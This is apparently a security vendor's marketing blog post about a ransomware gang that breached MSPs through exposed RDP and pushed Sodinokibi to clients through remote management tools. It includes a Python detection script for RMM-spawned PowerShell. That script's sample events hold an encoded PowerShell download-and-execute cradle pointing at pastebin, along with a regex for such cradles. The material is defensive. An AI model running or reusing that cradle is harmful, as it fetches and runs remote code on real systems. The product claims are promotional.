MSP security is not at the standard that it should be; how many more times must MSPs succumb to advanced hacker tradecraft before they seek out an effective security solution?
Last week, cyber criminals once again targeted managed service providers (MSPs). The attackers, believed to be a ransomware gang, breached the MSPs’ internal networks and leveraged the MSPs’ own legitimate tools and technologies to deploy ransomware on client networks. Unfortunately, this is not the first time such an event has occurred.
As described by news outlets, the attack timeline was as follows:
- Ransomware gang breaches MSPs via exposed remote desktop protocol (RDP) ports
- Once inside, the attackers elevated their privileges
- Next, the hackers disabled running anti-virus (A/V) products
- After disabling A/V products, the gang looked for popular remote management software accounts that MSPs use to legitimately monitor and manage their clients (software such as Webroot SecureAnywhere, Kaseya VSA, and ConnectWise Control)
- They discovered accounts that allowed them to gain access to Webroot’s SecureAnywhere, Kaseya VSA, and ConnectWise Control
- Finally, the hackers used these accounts to control the remote management software to download files from a popular file-hosting site (pastebin.com) and deploy a PowerShell script to the MSPs’ client networks. This PowerShell script downloaded and installed the Sodinokibi ransomware on client desktops, laptops, and servers.
As this recent example shows, running anti-virus products and using firewalls was ineffective at stopping this attack. Unfortunately, none of the cyber security solutions these MSPs employed helped them adequately detect and respond in real-time to these sophisticated cyberattacks. Why is that?
Cyber Criminals are leveraging known good
Most cyber security technologies and MSPs still focus on the tactics and techniques of the past and are not capable of detecting the tactics and techniques of modern cyber-attacks. Cyber criminals are very familiar with the defensive and detection technologies that most companies employ, including their weaknesses and limitations. In addition, many cyber criminals now rely on compromising accounts and abusing legitimate access mechanisms (like RDP) to initiate their attack – something that most traditional endpoint security tools cannot effectively defend against.
Here at Blackpoint we are genuinely concerned for all our partners and colleagues in the MSP community. The recent occurrence of not one, but two, attacks specifically targeted against MSPs, and the fact that MSPs have highly privileged access into their clients’ networks, give us strong reason to believe that more attacks against MSPs will occur, if they are not already happening. Unfortunately, many MSPs continue to focus heavily on endpoint security or lack the resources necessary to monitor their environments 24×7.
However, it doesn’t have to be this way.
Does an effective solution for MSPs exist?
At Blackpoint, we built our Managed Detection and Response service and patented SNAP-Defense platform specifically to address the tactics and techniques we saw in this most recent attack:
- The attackers gained access to the network via RDP; Blackpoint’s Managed Detection and Response platform SNAP-Defense monitors all RDP activity, regardless of the source, using its endpoint agent as well as via network traffic with its add-on NICOS module. Not only does SNAP detect the activity, it also provides information on the user RDP account involved, information about the source and destination, and even insight and visibility into what was occurring during the RDP session
- The attackers elevated privileges; SNAP-Defense monitors privileged accounts, especially privileged lateral spread/movement; in addition, its analyzer rules look for highly-privileged script executions
- The attackers disabled processes and services that should always be running; SNAP-Defense’s analyzer rules alert users when key or critical processes or services are not running. Detecting if something critical was terminated, especially systematically, is trivial in SNAP
- The attackers leveraged remote access management software to execute Microsoft PowerShell; SNAP-Defense can view process tree activity of remote management software like Webroot SecureAnywhere, Kaseya VSA, and ConnectWise Control, including the exact commands executed by these remote access tools
- The attackers used PowerShell with obfuscated command-line arguments (a common tactic) to download a malicious payload from pastebin.com; SNAP-Defense detects invocations of PowerShell and provides full command-line argument information even if the arguments are obfuscated
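An added example of the check described in the last two bullets: flag PowerShell launched by a remote management agent and decode `-EncodedCommand` arguments before inspecting them. This is not SNAP-Defense's logic or code from the original post; the agent process names and the event fields (`image`, `parent_image`, `command_line`) are assumptions, and the sample events are constructed.

```python
import base64
import re

# Assumed agent process names for the tools named above; adjust per environment.
RMM_PARENTS = {"agentmon.exe", "screenconnect.clientservice.exe", "wrsa.exe"}
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Decode -EncodedCommand (or any accepted abbreviation); None if absent/invalid."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # malformed base64 or invalid UTF-16
                return None
    return None

def triage(event):
    """Return reasons a process-creation event looks like RMM-driven PowerShell abuse."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    if basename(event["parent_image"]) in RMM_PARENTS:
        reasons.append("spawned by remote management agent")
    script = decode_encoded_command(event["command_line"])
    if script is not None:
        reasons.append("encoded command")
    text = script or event["command_line"]  # inspect the decoded script when present
    if "pastebin.com" in text.lower():
        reasons.append("references pastebin.com")
    if CRADLE.search(text):
        reasons.append("download-and-execute pattern")
    return reasons

# Constructed sample events (not taken from the incident described on this page).
_payload = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/CONSTRUCTED')"
_b64 = base64.b64encode(_payload.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files (x86)\Example\ScreenConnect.ClientService.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -enc {_b64}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]
```

Feed `triage` one dictionary per process-creation event (for example, mapped from Sysmon Event ID 1 fields); an empty list means no finding.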
With SNAP-Defense, Blackpoint’s experienced Managed Detection and Response team would’ve received multiple warnings and indicators that the MSPs were infected well before the final ransomware was deployed. Blackpoint analysts could’ve then responded immediately on the MSP’s behalf as soon as malicious activity was detected, even if that activity occurred off-hours.
Deploying a simple, effective and affordable solution.
With Blackpoint’s SNAP-Defense technology and true MDR service, MSPs do not need to live in fear of detecting and preventing such attacks. They also don’t need to rush out and buy every technology solution or service in the marketplace. Instead, they can partner with Blackpoint and leverage its decades of cyber security experience and world-class technology. The best part? Blackpoint’s technology and services are easy to implement, require no additional in-house resources, and are extremely cost-effective for the capability and coverage provided.
If you are an MSP, reach out today and learn about what we offer and how we can help. If you’re an MSP client, then you have a responsibility to ask your MSP what they are doing to protect themselves and you from this kind of attack. Lastly, if you’re a company looking for an MSP for managed IT services, we can recommend a few who are truly serious about the security of themselves and their clients. Visit our website to learn more.